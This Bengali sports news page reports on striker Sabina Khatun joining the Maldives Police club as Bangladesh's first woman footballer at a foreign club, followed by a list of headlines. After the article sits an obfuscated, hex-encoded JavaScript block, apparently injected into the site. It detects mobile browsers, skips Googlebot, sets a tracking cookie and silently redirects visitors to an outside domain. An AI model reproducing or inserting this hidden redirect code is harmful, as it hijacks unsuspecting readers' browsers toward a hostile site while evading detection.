for Add

সাবিনায় মুগ্ধ মালদ্বীপের ক্লাব

sabina-1

নিজস্ব প্রতিবেদক :  ‘ভাইয়া, ক্লাবের সবাই আমার উপর সন্তুষ্ট। ক্লাব কর্মকর্তা থেকে শুরু করে নতুন সতীর্থরাও আমাকে খুব আপন করে নিয়েছেন। অনুশীলনে আমার দিকে নজর রাখছেন সবাই-কথাগুলো বাংলাদেশ জাতীয় নারী দলের স্ট্রাইকার সাবিনা খাতুনের। যিনি এখন আছেন মালদ্বীপে। বাংলাদেশের প্রথম নারী ফুটবলার হিসেবে খেলবেন বিদেশি কোনো ক্লাবের হয়ে। তার এ ইতিহাস গড়ার ক্লাবের নাম মালদ্বীপ পুলিশ।
আজ (রবিবার) মালদ্বীপ থেকে সাবিনা ডেইলি স্পোর্টস২৪ডটকমকে জানান, ‘বুধবার এখানে এসে একদিন বিরতি দিয়েই অনুশীলন শুরু করেছি। মালদ্বীপ পুলিশ ক্লাবে আমিই একমাত্র বিদেশি খেলোয়াড়। যে কারণে সবার নজর আমার দিকে। দেশের ফুটবলকে এখানে উঁচুতে তোলার জন্য আমিও নিবিঢ় অনুশীন করছি।’‘ক্লাব মালদ্বীপস্ উইমেন্স ফুটসাল ফিয়েস্তা’নামের নারী ফুটবলারদের এ প্রতিযোগিতা অনুষ্ঠিত হবে ১৪ মার্চ থেকে ১৭ এপ্রিল পর্যন্ত। যেখানে অংশ নেবে ১৪ টি দল। সাবিনার ক্লাব প্রথম মাঠে নামবে ১৭ মার্চ, প্রতিপক্ষ এমইই ক্লাব।

Sabina-1

নতুন সতীর্থদের সঙ্গে সাবিনা

‘ইতিহাস’ সঙ্গে নিয়ে মালদ্বীপ গেছেন সাবিনা। ৪০ বছর আগে এমন এক ইতিহাস গড়েছিলেন দেশের অন্যতম সেরা ফুটবল তারকা কাজী মো. সালাউদ্দিন। ১৯৭৫ সালে তিনি খেলেছেন হংকংয়ের পেশাদার লিগে এফসি ক্যারোলিনের হয়ে। তখন কাজী সালাউদ্দিন ঢাকার ফুটবলে ছিলেন আবাহনীর খেলোয়াড়, সাবিনা মোহামেডানের।
মালদ্বীপের পুলিশ ক্লাব এক মাসের জন্য চুক্তি করেছেন সাবিনার সঙ্গে। পায়ের কাজ দিয়েই মালদ্বীপের ক্লাবটির কর্মকর্তাদের নজরে এসেছেন সাতক্ষীরার এ কন্যা। এক মাসে তিনি মালদ্বীপের ক্লাবটি থেকে পাবেন ৬ শত মার্কিন ডলার। সঙ্গে মালদ্বীপ যাওয়া-আসা, থাকা-খাওয়াসহ প্রয়োজনীয় ক্রীড়া সরঞ্জামাদিও দেবে তার প্রথম ভীনদেশি ক্লাব।

Sabina-2

অনুশীলনের ফাঁকে সাবিনা

সাবিনার এ ভাগ্য পরিবর্তনের ক্ষেত্রটা তৈরী করে দেয় গত নভেম্বরে পাকিস্তানে অনুষ্ঠিত নারী সাফ চ্যাম্পিয়নশিপ। বাংলাদেশের কাছে ৩-১ গোলে হেরেছিল মালদ্বীপ। দুটি গোল করেছিলেন সাবিনা। সেখানে উপস্থিত মালদ্বীপ পুলিশ ক্লাবের এক কর্মকর্তা তখনই পছন্দ করে রাখেন সাবিনাকে। তার দেশকে তছনছ করা বাংলাদেশের এ স্ট্রাইকারকেই নিজ ক্লাবে নেওয়ার পণ করেন ওই কর্মকর্তা। বাফুফের সঙ্গে যোগাযোগ রেখে শেষ পর্যন্ত সফলও হয় দ্বীপরাষ্ট্রের ক্লাবটি।

Sabina-3অনুশীলনে সাবিনা

মালদ্বীপ পুলিশ ক্লাব এ টুর্নামেন্টে বর্তমান রানার্সআপ। নিজ ক্লাবকে চ্যাম্পিয়ন করানোয় ভূমিকা রাখার প্রত্যয় নিয়ে মালদ্বীপ গেছেন সাবিনা। প্রতিশ্রুতি দিয়ে গেছেন ‘আমি ওখানে প্রমাণ করব বাংলাদেশের মেয়েরা সত্যিই ভাল ফুটবল খেলতে পারে। আমি ভাল খেললে দেশের অন্য মহিলা ফুটবলাররাও ভব্যিষতে বিদেশী ক্লাবগুলোতে খেলার সুযোগ পাবে।’

Sabina-4

অনুশীলনে সাবিনা

 var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

সব সংবাদ

শেষ ম্যাচের আগেই সেমিফাইনালে বাংলাদেশ সাফে মালদ্বীপকে উড়িয়ে প্রথম জয় পাকিস্তানের আপাতত লিড বাড়ানোই লক্ষ্য ওয়েস্ট ইন্ডিজের ঢাকা ইউনাইটেড অপরাজিত চ্যাম্পিয়ন হামজা-ফারহান যোগ দিচ্ছেন, শ্রীলঙ্কা ম্যাচে শক্তি বাড়ছে বাংলাদেশের ঐতিহাসিক ডাবল সেঞ্চুরিতে হৃদয়ের একাধিক রেকর্ড  রোনালদোর বিদায়বার্তায় মেসির চেয়ে বেশি সাড়া রোনালদোর আন্তর্জাতিক বিদায়কে ‘অবসর’ বলতে নারাজ মরিনিও আন্তর্জাতিক ফুটবলে রোনালদো-অধ্যায়ের সমাপ্তি মুশফিক-হৃদয়ের ব্যাটে লিড নেওয়ার আশা বাংলাদেশের ইব্রাহিমের গোলে সাফে বাংলাদেশের শুভসূচনা ২২ বছর পর ঢাকায় ভারত-পাকিস্তান, জিতল ভারত আন্তর্জাতিক ফুটবলকে বিদায় বললেন রোনালদো এক ম্যাচে ৫৩ লাল কার্ড, বিশ্বরেকর্ড! ২০ ওভার আগেই প্রথম দিনের খেলা শেষ ২৩ বছর পর শিরোপার স্বপ্ন, শুরুতেই ভুটান পরীক্ষা ভালো ফুটবল খেলাই ভারতের লক্ষ্য বিগব্যাশে মুস্তাফিজ, বাংলাদেশি তারকাকে ঘিরে বিশেষ আয়োজন বড়দিনের উপহার হিসেবে বাংলাদেশকে হোয়াইটওয়াশ করতে চান স্যামি নিরাপত্তা উদ্বেগে ১১ মাস পিছিয়ে গেল এশিয়ান কাপ মারুফাকে ছাড়াই ইমার্জিং ট্রফির দল, নেতৃত্বে নাহিদা ঢাকায় ভুটান, বাংলাদেশের অপেক্ষায় প্রথম প্রতিপক্ষ সিলেট টেস্টে বাংলাদেশকে নিয়ে সতর্ক স্যামি দুই প্রজন্মের ফুটবল তারকাদের মিলনমেলা নৌবাহিনীর শ্রেষ্ঠত্বের মধ্য দিয়ে শেষ হলো জাতীয় সাঁতার প্রথম টেস্টে বাংলাদেশকে হারিয়ে স্পিনারদের প্রশংসায় চেজ ব্যালন ডি’অর না জিতেও ইয়ামালকে নিয়ে গর্বিত ফ্লিক জাতীয় সাঁতারে আরো দুটি নতুন রেকর্ড ফাইনালে হার, রানার্সআপ বাংলাদেশ ক্যারিবীয়দের ২৪৫ রানে গুটিয়ে ব্যাটিং বিপর্যয়ে বাংলাদেশ জাতীয় ব্যাডমিন্টনে লিকা ও রজিন চ্যাম্পিয়ন জাতীয় সাঁতারের দ্বিতীয় দিনে আটটি নতুন রেকর্ড সাফের টিকিটে চড়া দাম; কাল থেকে বিক্রি শুরু প্রথম দিনেই দাপট বাংলাদেশের, ৯৯ রানে অপরাজিত সাদমান এশিয়া কাপ আরচ্যারীতে বাংলাদেশের স্বর্ণপদক জয় জাতীয় সাঁতারের প্রথম দিনেই ৬ নতুন রেকর্ড ক্যারিয়ারের এমন স্বীকৃতি কেইনকেই মানায় ভারতের কাছে ১৩ গোলের লজ্জা, এক মাসে হজম ২৩ ম্যাক্স গ্রুপ জাতীয় সাঁতার কাল শুরু ব্যালন ডি’অর ঘিরে তারার মেলা, আলোচনায় কেন-এমবাপ্পে-ইয়ামাল ‘ডি-থ্রি’ নিলামে জাতীয় তারকাদের নিয়ে কাড়াকাড়ি  উদ্বোধনী ম্যাচেই কাল বাংলাদেশ-ভারত লড়াই দুটি আত্মঘাতী গোলে বাংলাদেশের স্বপ্নভঙ্গ টেস্ট সিরিজের আগে ব্যাটিং অনুশীলনে লিটন ২১ স্বর্ণে চ্যাম্পিয়ন সেনাবাহিনী, সেরা ইমরানুর ও প্রিয়া সাফ চ্যাম্পিয়নশিপের ২৮ সদস্যের প্রাথমিক দলে নতুন দুই প্রবাসী স্পোর্টস জার্নালিস্ট অব দ্য ইয়ার রাহেনুর ইসলাম কোকো ১৮তম জাতীয় সামার অ্যাথলেটিকস প্রতিযোগিতা উদ্বোধন রাষ্ট্রপতির ইনফান্তিনোর পুনর্নির্বাচনকে সমর্থন জানাল এশীয় ফুটবল তৃণমূল থেকে আন্তর্জাতিক মানের খেলোয়াড় গড়ার পরিকল্পনা ক্রীড়া প্রতিমন্ত্রীর

For add

For add

গুরুত্বপূর্ণ কিছু লিংক

For add

For add

for Add